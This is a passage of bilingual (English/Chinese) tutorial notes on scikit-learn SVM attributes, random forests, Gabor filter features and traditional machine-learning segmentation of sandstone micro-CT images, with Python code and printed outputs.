    intercept_: ndarray of shape (n_classes * (n_classes - 1) / 2,)

    • Constants in decision function.
      • 决策函数中的常量。

    n_features_in_: int

    • Number of features seen during fit.
      • 装配过程中看到的特征数量。

    New in version 0.24.

    feature_names_in_: ndarray of shape (n_features_in_,)

    • Names of features seen during fit. Defined only when X has feature names that are all strings.
      • 装配过程中看到的特征名称。仅当 X 具有全部字符串的要素名称时才定义。

    New in version 1.0.

    n_iter_: ndarray of shape (n_classes * (n_classes - 1) // 2,)

    • Number of iterations run by the optimization routine to fit the model. The shape of this attribute depends on the number of models optimized which in turn depends on the number of classes.
      • 优化例程为拟合模型而运行的迭代次数。该属性的形状取决于优化的模型数量,而优化的模型又取决于类的数量。

    New in version 1.1.

    support_: ndarray of shape (n_SV)

    • Indices of support vectors.
      • 支持向量索引。

    support_vectors_: ndarray of shape (n_SV, n_features)
    Support vectors.

    n_support_: ndarray of shape (n_classes,), dtype=int32
    Number of support vectors for each class.

    probA_: ndarray of shape (n_classes * (n_classes - 1) / 2)
    Parameter learned in Platt scaling when probability=True.

    • 当概率为 True 时,在 Platt 缩放中学习的参数。

    probB_: ndarray of shape (n_classes * (n_classes - 1) / 2)
    Parameter learned in Platt scaling when probability=True.

    shape_fit_: tuple of int of shape (n_dimensions_of_X,)
    Array dimensions of training vector X.

    68b - SVM vs. Random Forest for image segmentation

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    import numpy as np
    import cv2
    import pandas as pd

    img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif')
    img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    img2 = img.reshape(-1)
    df = pd.DataFrame()
    df['Original Image'] = img2

    # Generate Gabor features
    num = 1
    kernels = []
    for theta in range(2):
    theta = theta / 4. * np.pi
    for sigma in (1, 3):
    for lamda in np.arange(0, np.pi, np.pi / 4):
    for gamma in (0.05, 0.5):
    gabor_label = 'Gabor' + str(num)
    ksize=9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img
    num += 1
    # CANNY EDGE
    edges = cv2.Canny(img, 100,200)
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1

    from skimage.filters import roberts, sobel, scharr, prewitt

    # ROBERTS EDGE
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # GAUSSIAN with sigma=3
    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # GAUSSIAN with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # MEDIAN with sigma=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # VARIANCE with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1

    ######################################

    # Now, add a column in the data frame for the Labels
    # For this, we need to import the labeled image
    labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif')
    # Remember that you can load an image with partial labels
    # But, drop the rows with unlabeled data

    labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_BGR2GRAY)
    labeled_img1 = labeled_img.reshape(-1)
    df['Labels'] = labeled_img1

    #########################################################

    # Define the dependent variable that needs to be predicted (labels)
    Y = df["Labels"].values

    # Define the independent variables
    X = df.drop(labels = ["Labels"], axis=1)

    # Split data into train and test to verify accuracy after fitting the model.
    from sklearn.model_selection import train_test_split
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
    1
    2
    3
    4
    5
    from sklearn.svm import LinearSVC

    model = LinearSVC(max_iter=100)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\svm\_base.py:1225: ConvergenceWarning: Liblinear failed to converge, increase the number of iterations.  warnings.warn(

    SVM 的速度要比 随机森林 慢得多

    1
    2
    3
    from sklearn import metrics

    print("Accuracy=", metrics.accuracy_score(Y_test, prediction_test))
    Accuracy= 0.9525666606203519
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    # You can store the model for future use. In fact, this is how you do machine elarning
    # Train on training images, validate on test images and deploy the model on unknown images.
    # 储存训练模型

    import pickle

    # Save the trained model as pickle string to disk for future use
    filename = "sandstone_model"
    pickle.dump(model, open(filename, 'wb'))

    # To test the model on future datasets
    loaded_model = pickle.load(open(filename, 'rb'))
    result = loaded_model.predict(X)

    # 将分割结果以图片显示
    segmented = result.reshape((img.shape))

    from matplotlib import pyplot as plt

    plt.imshow(segmented, cmap ='jet')
    plt.imsave('segmented_rock_RF_100_estim.jpg', segmented, cmap ='jet')

    png

    虽然这并不意味着支持向量机没用,但我的意思是,对于像素分割,支持向量机可能不是正确的选择,但是如果你有图像分类,支持向量机实际上做得很好。

    ]]>
    @@ -8795,7 +8795,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(59-67)-Random%20Forest%20Classifier/ - 正文

    59 - What is Random Forest classifier

    很多的决策树在一起就变成了森林,就是随机森林了。

    • 决策树

    比如要将一张图分类成:

    • Air 空气

    • Pyrite 黄铁矿

    • Clay 粘土

    • Pore 孔洞

    • Quartz 石英

    从图像的 Pixel Value 灰度值和 Texture 纹理进行分类:

    jpg

    • Why start with pixel value and not texture metric for this image?

      • 为什么从像素值开始,而不是纹理度量这张图像?
    • Because it gives the best split of input data.

      • 因为它给出了输入数据的最佳分割。
    • How to pick a node that gives the best split?

      • 如何选择一个能给出最佳分割的节点?
    • Use Gini impurity → pick the one that maximizes the Gini gain.

      • 使用基尼系数→选择一个使基尼系数增益最大化的。
    • Gini lmpurity is the probability of incorrectly classifying a randomly chosenelement in the dataset if it were randomly labeled according to the classdistribution in the dataset. lt’s calculated as

      • 基尼系数是指数据集中随机选择的元素,如果根据数据集中的类别分布随机标记,则错误分类的概率。计算为

    $$G=\sum^C_{i=1}p(i)*\left(1-p(i)\right)$$

    • where $C$ is the number of classes and $p(i)$ is the probability of randomly picking an element of class $i$.

      • 其中 $C$ 是类的数量,$p(i)$ 是随机抽取类 $i$ 中的一个元素的概率。
    • Primary Disadvantage of decision trees:
      Often suffers from overfitting →works well on training data but fails on newdata leading to low accuracy.

      • 决策树的主要缺点:

        经常存在过拟合问题→在训练数据上很好,但在新数据上失败,导致精度低。

    • Random Forest to the rescue!

      • 使用决策森林规避决策树的缺点。

    jpg

    60 - How to use Random Forest in Python

    import pandas as pd
    import matplotlib.pyplot as plt
    import numpy as np

    df = pd.read_csv('data/images_analyzed_productivity1.csv')
    df.head()
    User Time Coffee Age Images_Analyzed Productivity
    0 1 8 0 23 20 Good
    1 1 13 0 23 14 Bad
    2 1 17 0 23 18 Good
    3 1 22 0 23 15 Bad
    4 1 8 2 23 22 Good
    sizes = df['Productivity'].value_counts(sort=1)
    sizes
    Bad     42Good    38Name: Productivity, dtype: int64

    去除无关的列

    df.drop(['Images_Analyzed'], axis=1, inplace=True)
    df.drop(['User'], axis=1, inplace=True)
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 Good
    1 13 0 23 Bad
    2 17 0 23 Good
    3 22 0 23 Bad
    4 8 2 23 Good

    删除缺失数据

    df = df.dropna()

    将分析结果转换为数字

    df.Productivity[df.Productivity == 'Good'] = 1
    df.Productivity[df.Productivity == 'Bad'] = 2
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 1
    1 13 0 23 2
    2 17 0 23 1
    3 22 0 23 2
    4 8 2 23 1

    定义因变量

    Y = df['Productivity'].values
    Y = Y.astype('int')
    Y
    array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,       1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,       1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,       1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])

    定义自变量

    X = df.drop(labels=['Productivity'], axis=1)

    将数据分割为训练集和测试集

    from sklearn.model_selection import train_test_split

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)

    使用随机森林

    sklearn.ensemble.RandomForestClassifier

    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier(n_estimators=10, random_state=30)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    prediction_test
    array([1, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 1, 2, 1, 2,       1, 1, 2, 1, 1, 2, 1, 1, 1, 1])

    计算训练出的结果的精确度

    from sklearn import metrics

    print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9375

    扩大训练集的比例可以增加精确度

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
    model = RandomForestClassifier(n_estimators=10, random_state=30)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    prediction_test
    print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9375

    显示特征值的重要性

    feature_list = list(X.columns)
    feature_imp = pd.Series(model.feature_importances_, index=feature_list).sort_values(ascending=False)
    feature_imp
    Time      0.714433Coffee    0.205474Age       0.080092dtype: float64

    随机森林可视化

    python 随机森林可视化_阿雷吖睚的博客-CSDN 博客_随机森林可视化

    from IPython.display import HTML, display
    from sklearn import tree
    import pydotplus

    estimators = model.estimators_
    for m in estimators:
    dot_data = tree.export_graphviz(m, out_file=None,
    feature_names=['Time', 'Coffee', 'Age'],
    class_names=['Good', 'Bad'],
    filled=True, rounded=True,
    special_characters=True)
    graph = pydotplus.graph_from_dot_data(dot_data)
    # 使用 ipython 的终端 jupyter notebook 显示。
    svg = graph.create_svg()
    if hasattr(svg, "decode"):
    svg = svg.decode("utf-8")
    html = HTML(svg)
    display(html)

    svg

    61 - How to create Gabor feature banks for machine learning

    import numpy as np
    import cv2
    import matplotlib.pyplot as plt
    import pandas as pd
    img = cv2.imread('images/synthetic.jpg', 0)
    df = pd.DataFrame()
    img2 = img.reshape(-1)
    df['Original Pixels'] = img2
    df
    Original Pixels
    0 255
    1 255
    2 255
    3 255
    4 255
    ... ...
    363446 255
    363447 255
    363448 255
    363449 255
    363450 255

    363451 rows × 1 columns

    设置 Gabor 的不同参数构造出不同的卷积核,生成用于机器学习的 csv 文件:

    num = 1
    for sigma in (3, 5):
    for theta in range(2):
    theta = theta / 4. * np.pi
    for lamda in np.arange(0, np.pi, np.pi / 4.):
    for gamma in (0.05, 0.5):
    gabor_label = 'Gabor ' + str(num)
    kernel = cv2.getGaborKernel((5, 5), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img
    num += 1
    df.head()
    Original Pixels Gabor 1 Gabor 2 Gabor 3 Gabor 4 Gabor 5 Gabor 6 Gabor 7 Gabor 8 Gabor 9 ... Gabor 23 Gabor 24 Gabor 25 Gabor 26 Gabor 27 Gabor 28 Gabor 29 Gabor 30 Gabor 31 Gabor 32
    0 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    1 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    2 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    3 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    4 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255

    5 rows × 33 columns

    df.to_csv('Gabor.csv')

    png

    62 - Image Segmentation using traditional machine learning - The plan

    ​ 讲了下后面几篇视频要干啥。

    63 - Image Segmentation using traditional machine learning Part1 - FeatureExtraction

    import numpy as np
    import cv2
    import pandas as pd
    import matplotlib.pyplot as plt

    img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x17d0c13f730>

    png

    df = pd.DataFrame()
    • Add original pixel values to the data frame as feature #1
    img2 = img.reshape(-1)
    df['Original Image'] = img2
    df.head()
    Original Image
    0 0
    1 0
    2 0
    3 0
    4 0
    • Add Other features

    • First set - Gabor features

    # Generate Gabor features
    num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
    kernels = []
    for theta in range(2): # Define number of thetas
    theta = theta / 4. * np.pi
    for sigma in (1, 3): # Sigma with 1 and 3
    for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
    for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
    gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
    ksize = 9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter the image and add values to a new column
    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img # Labels columns as Gabor1, Gabor2, etc.
    print(gabor_label, ': theta =', theta, ': sigma =', sigma, ': lamda =', lamda, ': gamma =', gamma)
    num += 1 # Increment for gabor column label
    Gabor1 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.05Gabor2 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.5Gabor3 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05Gabor4 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.5Gabor5 : theta = 0.0 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.05Gabor6 : theta = 0.0 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.5Gabor7 : theta = 0.0 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.05Gabor8 : theta = 0.0 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.5Gabor9 : theta = 0.0 : sigma = 3 : lamda = 0.0 : gamma = 0.05Gabor10 : theta = 0.0 : sigma = 3 : lamda = 0.0 : gamma = 0.5Gabor11 : theta = 0.0 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.05Gabor12 : theta = 0.0 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.5Gabor13 : theta = 0.0 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.05Gabor14 : theta = 0.0 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.5Gabor15 : theta = 0.0 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.05Gabor16 : theta = 0.0 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.5Gabor17 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.0 : gamma = 0.05Gabor18 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.0 : gamma = 0.5Gabor19 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05Gabor20 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.5Gabor21 : theta = 0.7853981633974483 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.05Gabor22 : theta = 0.7853981633974483 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.5Gabor23 : theta = 0.7853981633974483 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.05Gabor24 : theta = 0.7853981633974483 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.5Gabor25 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.0 : gamma = 0.05Gabor26 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.0 : gamma = 0.5Gabor27 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.05Gabor28 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.5Gabor29 : theta = 0.7853981633974483 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.05Gabor30 : theta = 0.7853981633974483 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.5Gabor31 : theta = 0.7853981633974483 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.05Gabor32 : theta = 0.7853981633974483 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.5
    • Gerate OTHER FEATURES and add them to the data frame

    • Canny edge

    edges = cv2.Canny(img, 100, 200)
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1
    • ROBERTS EDGE
    from skimage.filters import roberts, sobel, scharr, prewitt

    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1
    • SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1
    • SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1
    • PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1
    • GAUSSIAN with sigma = 3
    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1
    • GAUSSIAN with sigma = 7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3
    • MEDIAN with sigma = 3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1
    • VARIANCE with size = 3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    df.head()
    Original Image Gabor1 Gabor2 Gabor3 Gabor4 Gabor5 Gabor6 Gabor7 Gabor8 Gabor9 ... Gabor32 Canny Edge Roberts Sobel Scharr Prewitt Gaussian s3 Gaussian s7 Median s3 Variance s3
    0 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    1 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    2 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    3 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    4 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0

    5 rows × 42 columns


    labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif', 0)
    labeled_img1 = labeled_img.reshape(-1)
    df['Label'] = labeled_img1

    64 - Image Segmentation using traditional machine learning - Part2 Training RF

    • Dependent variable
    Y = df['Label'].values
    X = df.drop(labels=['Label'], axis=1)
    • Split data into test and train
    from sklearn.model_selection import train_test_split

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
    • Import ML algorithm and train the model
    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier(n_estimators=10, random_state=42)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    from sklearn import metrics

    print("Accuracy =", metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9812850216441728

    65 - Image Segmentation using traditional machine learning - Part3 Feature Ranking

    fig = plt.figure(figsize=(12, 16))
    p = 1
    for index, feature in enumerate(df.columns):
    if index == 0:
    p += 1
    ax = fig.add_subplot(181)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text(feature)
    else:
    if p % 8 == 1:
    p += 1
    exec("ax" + str(index) + "=fig.add_subplot(6, 8, " + str(p) + ")")
    plt.xticks([])
    plt.yticks([])
    exec("ax" + str(index) + ".imshow(np.array(df[feature]).reshape(img.shape), cmap='gray')")
    exec("ax" + str(index) + ".title.set_text('" + feature + "')")
    p += 1
    plt.show()

    png

    importances = list(model.feature_importances_)
    features_list = list(X.columns)
    feature_imp = pd.Series(model.feature_importances_, index=features_list).sort_values(ascending=False)
    feature_imp
    Gabor4            0.248493Gaussian s3       0.168623Median s3         0.122685Original Image    0.092540Gabor8            0.086585Gabor11           0.076893Gabor3            0.070587Gabor6            0.021357Gaussian s7       0.020470Gabor24           0.011645Gabor7            0.010555Prewitt           0.010252Gabor21           0.007676Sobel             0.007102Gabor23           0.006989Gabor5            0.006329Scharr            0.005543Roberts           0.005393Gabor22           0.004461Variance s3       0.002942Gabor31           0.002886Gabor29           0.002720Gabor32           0.002607Gabor30           0.002361Canny Edge        0.001267Gabor12           0.001025Gabor20           0.000011Gabor28           0.000002Gabor27           0.000002Gabor14           0.000000Gabor26           0.000000Gabor25           0.000000Gabor1            0.000000Gabor19           0.000000Gabor18           0.000000Gabor17           0.000000Gabor16           0.000000Gabor10           0.000000Gabor9            0.000000Gabor15           0.000000Gabor2            0.000000Gabor13           0.000000dtype: float64

    66 - Image Segmentation using traditional machine learning - Part4 Pickling Model

    import pickle

    filename = 'sandstone_model'
    pickle.dump(model, open(filename, 'wb'))

    load_model = pickle.load(open(filename, 'rb'))
    result = load_model.predict(X)

    segmented = result.reshape((img.shape))
    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='jet')
    <matplotlib.image.AxesImage at 0x17d37062220>

    png

    plt.imsave('segmented_rock.jpg', segmented, cmap='jet')

    67 - Image Segmentation using traditional machine learning - Part5 Segmenting Images

    import numpy as np
    import cv2
    import pandas as pd

    def feature_extraction(img):
    df = pd.DataFrame()


    # All features generated must match the way features are generated for TRAINING.
    # Feature1 is our original image pixels
    img2 = img.reshape(-1)
    df['Original Image'] = img2

    # Generate Gabor features
    num = 1
    kernels = []
    for theta in range(2):
    theta = theta / 4. * np.pi
    for sigma in (1, 3):
    for lamda in np.arange(0, np.pi, np.pi / 4):
    for gamma in (0.05, 0.5):
    gabor_label = 'Gabor' + str(num)
    ksize=9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter image and add values to new column
    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img # Modify this to add new column for each gabor
    num += 1
    ########################################
    # Geerate OTHER FEATURES and add them to the data frame
    # Feature 3 is canny edge
    edges = cv2.Canny(img, 100,200) # Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1 # Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # Feature 4 is Roberts edge
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # Feature 5 is Sobel
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # Feature 6 is Scharr
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # Feature 7 is Prewitt
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # Feature 8 is Gaussian with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # Feature 9 is Gaussian with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # Feature 10 is Median with sigma=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # Feature 11 is Variance with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    return df
    import glob
    import pickle
    from matplotlib import pyplot as plt

    filename = "sandstone_model"
    loaded_model = pickle.load(open(filename, 'rb'))

    path = "images/Train_images/*.tif"
    for file in glob.glob(path):
    print(file) # just stop here to see all file names printed
    img = cv2.imread(file, 0)
    # Call the feature extraction function.
    X = feature_extraction(img)
    result = loaded_model.predict(X)
    segmented = result.reshape((img.shape))

    name = file.split("e_")
    cv2.imwrite('images/Segmented/'+ name[1], segmented)

    jpg

    67b - Feature based image segmentation using traditional machine learning. -Multi-training images-

    总结通过传统机器学习方法进行图像分类的各个步骤。

    使用随机森林或支持向量机,这是传统的机器学习方法之一,我相信这比深度学习方法要好得多,因为对于大多数应用程序来说,您通常没有深度学习所需的数据类型,因此传统机器学习有时效果很好,如果您没有大量训练数据,实际上有时比深度学习好得多。

    import numpy as np
    import cv2
    import pandas as pd
    import pickle
    from matplotlib import pyplot as plt
    import os
    • STEP 1: READ TRAINING IMAGES AND EXTRACT FEATURES
    image_dataset = pd.DataFrame()  # Dataframe to capture image features

    img_path = "images/train_images/"
    for image in os.listdir(img_path): # iterate through each file
    print(image)

    df = pd.DataFrame() # Temporary data frame to capture information for each loop.
    # Reset dataframe to blank after each loop.

    input_img = cv2.imread(img_path + image) # Read images

    # Check if the input image is RGB or grey and convert to grey if RGB
    if input_img.ndim == 3 and input_img.shape[-1] == 3:
    img = cv2.cvtColor(input_img,cv2.COLOR_BGR2GRAY)
    elif input_img.ndim == 2:
    img = input_img
    else:
    raise excerption("The module works only with grayscale and RGB images!")

    ################################################################
    # START ADDING DATA TO THE DATAFRAME

    # Add pixel values to the data frame
    pixel_values = img.reshape(-1)
    df['Pixel_Value'] = pixel_values # Pixel value itself as a feature
    df['Image_Name'] = image # Capture image name as we read multiple images

    ############################################################################
    # Generate Gabor features
    num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
    kernels = []
    for theta in range(2): # Define number of thetas
    theta = theta / 4. * np.pi
    for sigma in (1, 3): # Sigma with 1 and 3
    for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
    for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
    gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
    ksize=9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter the image and add values to a new column
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img #Labels columns as Gabor1, Gabor2, etc.
    print(gabor_label, ': theta=', theta, ': sigma=', sigma, ': lamda=', lamda, ': gamma=', gamma)
    num += 1 # Increment for gabor column label
    ########################################
    # Gerate OTHER FEATURES and add them to the data frame

    # CANNY EDGE
    edges = cv2.Canny(img, 100,200) #Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1 #Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # ROBERTS EDGE
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # GAUSSIAN with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # GAUSSIAN with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # MEDIAN with sigma=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # VARIANCE with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    ######################################
